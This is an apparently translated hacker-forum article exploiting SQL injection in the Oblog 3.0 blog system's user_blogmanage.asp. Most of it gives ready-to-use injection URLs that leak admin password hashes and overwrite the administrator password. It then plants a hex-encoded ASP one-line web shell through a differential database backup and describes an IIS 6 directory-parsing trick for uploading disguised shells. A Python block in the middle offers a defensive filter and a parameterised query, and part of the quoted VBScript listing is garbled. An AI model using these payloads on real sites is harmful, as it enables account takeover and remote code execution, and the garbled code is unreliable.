After watching Black Defense Laboratory's sixth-round penetration of the Oblog 3.0 Access version, my admiration flowed like the surging waters of the Yangtze, like the Yellow River bursting its banks. In particular, they made full use of social engineering and a clever way of uploading a shell from the back end. Admire, admire. Enough nonsense, let's get to the point. While reading the Oblog 3.0 code I found a security risk in the user_blogmanage.asp file. Let's look at the code that moves blog entries:
sub moveblog()
if id="" then
("Please specify the log to be moved")
exit sub
end if
dim subjectid
subjectid=trim(request("subject"))
if subjectid="" then
("Please specify the topic to move")
exit sub
else
subjectid=Clng(subjectid)
end if
if instr(id,",")>0 then
'If the id variable contains a comma, strip the spaces from it and execute the following SQL statement. Call this the first statement.
'Note that only subjectid is cast with Clng; id is concatenated into the SQL as a string.
'The "subjectid=" and "logid=" parts of the two statements were lost in this copy of the listing and are restored from the surrounding code (assumed).
id=replace(id," ","")
sql="Update [Oblog_log] set subjectid=" & subjectid & " where logid in (" & id & ")"&wsql
'Otherwise execute this statement. Call it the second one.
else
sql="Update [Oblog_log] set subjectid=" & subjectid & " where logid=" & id & wsql
set blog=nothing
set rs=("select subjectid from Oblog_subject where userselect count(logid) from Oblog_log where Oblog_log.subjectupdate Oblog_subject set subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subject.subject re-released theme to make the topic count accurate!",""
end sub
Now look at how the id variable is filtered at the top of the file: id=Oblog.filt_badstr(trim(Request("id"))). That is the only filtering applied, and the function is:
public function filt_badstr(str)
If Isnull(Str) Then
filt_badstr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
filt_badstr = Replace(Str,"'","''")
end function
Only \0 and single quotes are handled. Haha, how could that stop our injection? Find a site running the Oblog 3.0 SQL version and try it. The test statement for probing the environment is /user_blogmanage.asp?action=Move&subject=1&id=@@version)-- ; be sure to pay attention to the "'" at the end of the statement, otherwise it will not succeed.
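As an added defensive illustration (not Oblog's own code), here is a Python port of filt_badstr beside a strict parser for the id parameter and a parameterised form of the UPDATE, run over constructed samples that include the id values the article submits; the function names and samples are my own.

```python
import re

def filt_badstr(s):
    """Port of Oblog 3.0's filt_badstr (VBScript): strips NUL and doubles single quotes.
    Spaces, commas, semicolons, parentheses and -- comments all pass through untouched."""
    if s is None:
        return ""
    return s.replace("\x00", "").replace("'", "''")

# The id parameter is only ever a comma-separated list of log ids, so accept exactly that.
_ID_LIST = re.compile(r"^\d{1,10}(,\d{1,10})*$")

def parse_log_ids(raw):
    """Strict replacement for the string filter: returns a list of ints, or None if the
    value is anything other than a list of numeric log ids."""
    if raw is None:
        return None
    cleaned = raw.replace(" ", "")          # the original code strips spaces as well
    if not _ID_LIST.fullmatch(cleaned):
        return None
    return [int(x) for x in cleaned.split(",")]

def build_move_query(subjectid, raw_ids):
    """Parameterised equivalent of the string-built UPDATE in moveblog.
    Returns (sql, params) using '?' placeholders (ADODB.Command / pyodbc style),
    or None when the id parameter is rejected."""
    ids = parse_log_ids(raw_ids)
    if not ids:
        return None
    placeholders = ",".join("?" * len(ids))
    sql = f"UPDATE [Oblog_log] SET subjectid=? WHERE logid IN ({placeholders})"
    return sql, [int(subjectid), *ids]

# Constructed samples: the two legitimate shapes moveblog expects, then the kinds of
# id values the article sends (first-branch, second-branch and stacked-query forms).
SAMPLES = {
    "single": "12",
    "list": "3, 5,8",
    "first_branch": "@@version)--",
    "second_branch": "1 and 1=(select password from Oblog_admin where id=1)--",
    "stacked": "1;update [Oblog_admin] set password=char(0x34) where id=1--",
}

def audit(samples=SAMPLES):
    """Per sample: (original filter leaves it unchanged?, strict parser accepts it?)."""
    return {name: (filt_badstr(v) == v, parse_log_ids(v) is not None)
            for name, v in samples.items()}

if __name__ == "__main__":
    for name, (unchanged, accepted) in audit().items():
        print(f"{name:14} filt_badstr unchanged={unchanged!s:5} strict parser accepts={accepted}")
```

Every injected value sails through filt_badstr unchanged because none of them needs a single quote, while the strict parser rejects all three and accepts only the two genuine id lists.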
The injection above hits the first statement, which has more restrictions: spaces cannot be used and the submitted value must contain a comma. We can use /**/ instead of spaces. Because of these restrictions, in the tests that follow we steer the program into executing the second statement. Further probing of the environment:
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_name()>0--
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_user>0--
Hehe, the test succeeded. Since the injected statement cannot contain single quotes, we battle-hardened veterans can easily get around that limitation. I like to use SQL's char function; I happen to have a char-encoding tool I wrote while studying the Dongyi system. First, look at the table structure of the Oblog database. In the Oblog_admin table we are only interested in the id, username and password fields. Let's first expose the password of the admin user, or of the administrator whose id is 1:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where id=1)--
or
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where username=char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e))--
Here char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e) is the submitted string admin encoded with the char function. The result is returned.
Write down this password hash first; we will need it again when restoring the administrator's password. Now modify the back-end administrator's password:
/user_blogmanage.asp?action=Move&subject=1&id=1;update [Oblog_admin] set password= char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) where id=1--
Here char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) is the encoding of the string 469e80d32c0559f8; the md5 plaintext corresponding to 469e80d32c0559f8 is admin888. The following tool can be used to encode the string.
Of course everyone has better tools. This changes the password of the administrator with id 1 to admin888. Note that the account belonging to the administrator with id 1 is admin; if you are not sure, you can check with the following statement:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select username from Oblog_admin where id=1)--
After the change, log in to the back end to see whether the administrator password was really changed. Good, we now have back-end management rights, which is great. Don't celebrate too early, though: we are in the back end, but the SQL version differs from the Access version, and the method of getting a WebShell by backing up the database that the two heroes introduced earlier does not work on the SQL version. Look at the following code from admin_database.asp and you will understand:
dim dbpath
dim ObjInstalled
if not IsObject(conn) then link_database
if is_sqldata=0 then dbpath=(db)
The dbpath parameter is only initialised when is_sqldata=0, that is, on the Access version.
Here I will introduce several ways of getting a WebShell on the SQL version.
First, the more general method. It relies on SQL Server features: xp_cmdshell, the OLE object interface, sp_makewebtask, incremental backup and so on. A necessary condition for all of them is the physical path of the web root, which is easy to obtain from the back-end management homepage. For the specific injection statements you can refer to the relevant code there; pay attention to handling single quotes in the implementation. The program can automatically pick up the cookie information from IE, so there is no need to fill in cookies.
As for using back-end functions to upload a shell, it stumped me for a long time; I was overthinking it. At first the method was Angel Doll's: the idea was to add shtm as an allowed upload type and use include. That way you could only read the database connection information, and if the other side had a firewall or the account lacked high privileges you could not get a shell. Later they tried adding aaspsp/ and asp/ as upload types; modifying the packet made the page report a successful upload, but the file was not really uploaded. Very depressing. Over the holiday there was not much time to look for the cause. Then I noticed that the user directory can be set in the back end, and suddenly remembered a feature of the Windows 2003 / IIS 6.0 platform that had been circulating on the Internet: any file, whatever its extension, under a virtual directory named **.asp is interpreted and executed as an asp file. I almost jumped up when I thought of it, hehe. The operation: in the back-end general settings | User directory management, create a new **.asp directory and set it as the default directory, as shown in the figure above. Then register a new user on the site, enter the management centre, choose the album and upload an asp * disguised as a gif. When we request that gif, IIS parses it as asp. I tested this locally on the Access version and the file could be uploaded. On the SQL version, however, the file could not be written to this directory and the following error appeared:
Error '800a0bbc'
Write to the file failed.
/inc/, line 312
Although it did not succeed here, this is a good way to upload *s from the back end, because most ASP whole-site programs let the back end change the upload directory, Dongyi for example. No way around it; we have to use the first method. Start building:
Step 1:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare @a sysname;declare @s nvarchar(4000);select @a=db_name();select @s=0x77006F006B0061006F002E00620061006B00;backup database @a to disk=@s--
Note that the statement must not contain single quotes.
Step 2:
/user_blogmanage.asp?action=Move&subject=1&id=1;create table [dbo].[llikz] ([cmd] [image])--
Step 3:
/user_blogmanage.asp?action=Move&subject=1&id=1;insert into llikz(cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
Note that 0x3C25657865637574652872657175657374282261222929253E is
Step 4:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare @a sysname;declare @s nvarchar(4000) select @a=db_name();select @s=0x66003a005c0062006c006f00670032003000300035005c0062006c006f0067007300650072007600650072005c006c006c0069006b007a002e00610073007000;backup database @a to disk=@s WITH DIFFERENTIAL--
Here 0x66003a005c0062006c006f00670032003000300035005c0062006c006f0067007300650072007600650072005c006c006c0069006b007a002e00610073007000 is the physical path of the web root obtained in the back end.
Incremental backup only needs public permissions, which should be the best way to get a WebShell on the Oblog 3.0 SQL version. If you find the procedure too complicated, you don't need a WebShell at all: go to the back end and upgrade your account to VIP, or set the upload quota to 10000000KB and use the blog as a network USB stick, haha. Because Oblog is so widespread on the Internet, this vulnerability is very damaging, so don't mess around.